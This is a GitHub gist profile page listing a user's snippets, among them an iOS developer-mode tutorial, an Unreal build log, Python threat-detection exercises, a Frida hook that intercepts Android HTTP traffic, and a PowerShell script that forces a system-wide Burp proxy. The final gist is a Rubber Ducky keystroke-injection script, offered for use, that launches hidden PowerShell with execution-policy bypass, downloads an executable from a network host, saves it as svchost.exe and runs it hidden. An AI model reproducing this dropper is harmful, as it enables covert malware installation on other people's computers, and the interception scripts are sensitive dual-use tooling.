Skip to content

Instantly share code, notes, and snippets.

View zr0n's full-sized avatar

Luiz Fernando zr0n

View GitHub Profile
@zr0n
zr0n / Tutorial Enable Devmode.md
Created March 24, 2026 16:20
Enable developer mode on IOS using windows

How to Enable Developer Mode on iOS 18 Using iCareFone (Windows)

Requirements: Windows 10/11 PC · iCareFone installed · iPhone running iOS 18 · USB cable


What Is Developer Mode?

Developer Mode is a security feature introduced in iOS 16 that must be manually enabled before running development builds, automation tools, or third-party management software like iCareFone. It is disabled by default on all devices.

@zr0n
zr0n / AAAAAA
Created February 10, 2026 03:33
<key>NSCameraUsageDescription</key>
<string>This app needs access to the camera</string>
<key>NSMicrophoneUsageDescription</key>
<string>This app needs access to the microphone for voice chat</string>
<key>NSPhotoLibraryUsageDescription</key>
<string>This app needs access to your photos</string>
Log started at 2/3/2026 4:22:04 PM (2026-02-03T19:22:04Z)
Starting AutomationTool...
Parsing command line: -ScriptsForProject=E:/UnrealProjects/Telo/HelloTelo/HelloTelo.uproject Turnkey -command=VerifySdk -platform=Android -UpdateIfNeeded -EditorIO -EditorIOPort=40767 -project=E:/UnrealProjects/Telo/HelloTelo/HelloTelo.uproject BuildCookRun -nop4 -utf8output -nocompileeditor -skipbuildeditor -cook -project=E:/UnrealProjects/Telo/HelloTelo/HelloTelo.uproject -target=HelloTelo -unrealexe=D:\UE_5.7\Engine\Binaries\Win64\UnrealEditor-Cmd.exe -platform=Android -cookflavor=ETC2 -installed -SkipCookingErrorSummary -JsonStdOut -stage -archive -package -build -pak -iostore -compressed -prereqs -archivedirectory=E:/UnrealProjects/Telo/HelloTelo/Build/single_apk -clientconfig=Development -nocompile -nocompileuat
Found project file: E:\UnrealProjects\Telo\HelloTelo\HelloTelo.uproject
Found 2 scripts to execute:
Turnkey(command=VerifySdk, platform=Android, UpdateIfNeeded, EditorIO, EditorIOPort=40767, project=E:/UnrealP
@zr0n
zr0n / mac
Last active January 30, 2026 16:33
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
echo 'eval "$(/opt/homebrew/bin/brew shellenv)"' >> ~/.zprofile
eval "$(/opt/homebrew/bin/brew shellenv)"
# 1. Fazer backup dos binários originais do Unreal
cd "/Users/Shared/Epic Games/UE_5.7/Engine/Extras/ThirdPartyNotUE/libimobiledevice/Mac/"
sudo mkdir backup
sudo mv idevice_id backup/
sudo mv ideviceinstaller backup/ 2>/dev/null
"""
SISTEMA DE DETECÇÃO DE AMEAÇAS EM REDES - CODE CHALLENGE
Instruções:
Implemente as funções abaixo seguindo os requisitos.
Não altere os nomes das funções ou parâmetros.
Teste sua solução com os asserts fornecidos.
"""
import collections
"""
CODE CHALLENGE (prova em branco)
Implemente a função detect_failed_logins(lines, window_seconds=60, threshold=5)
Retorno esperado:
- dict no formato:
{
"IP": {"count": <int>},
...
"""
TESTE - Top K itens mais frequentes em uma lista de strings
Objetivo:
Dada uma lista de strings `items` e um inteiro `k`, retornar os K itens mais frequentes.
Regras:
- Retorne uma lista de tuplas (item, contagem).
- Ordenação:
1) contagem DESC
Java.perform(function() {
var ByteArrayOutputStream = Java.use('java.io.ByteArrayOutputStream');
var InputStreamReader = Java.use('java.io.InputStreamReader');
var BufferedReader = Java.use('java.io.BufferedReader');
var StringBuilder = Java.use('java.lang.StringBuilder');
var HttpURLConnection = Java.use('java.net.HttpURLConnection');
HttpURLConnection.getOutputStream.implementation = function() {
var outputStream = this.getOutputStream();
@zr0n
zr0n / install_proxy.ps1
Created December 25, 2025 14:13
Burp Proxy
# configure-system-proxy.ps1 - Configura proxy a nível de SISTEMA e aplica imediatamente.
# Execute como Administrador.
$ProxyServer = "192.168.0.41:8080"
$CertURL = "http://$ProxyServer/cert"
Write-Host "[*] Configurando proxy de sistema para $ProxyServer..." -ForegroundColor Cyan
# 1. CONFIGURAÇÃO DO REGISTRO (SISTEMA E USUÁRIO ATUAL)
Write-Host "[1] Configurando chaves de registro do proxy..."
@zr0n
zr0n / Download_And_Execute_Payload.duck
Last active October 31, 2025 19:11
Duck script for downloading a executable and executing it (on windows). By Ziron.
REM Substitua http://192.168.0.47/NiceGuy.exe pela url do seu payload (executavel)
DELAY 2000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "try { iwr 'http://192.168.0.47/NiceGuy.exe' -OutFile '$env:temp\svchost.exe' -UseBasicParsing } catch { try { (New-Object Net.WebClient).DownloadFile('http://192.168.0.47/NiceGuy.exe', '$env:temp\svchost.exe') } catch { Import-Module BitsTransfer; Start-BitsTransfer -Source 'http://192.168.0.47/NiceGuy.exe' -Destination '%TEMP%\Nice.exe' } }; Start-Process -WindowStyle Hidden '%TEMP%\Nice.exe'"
ENTER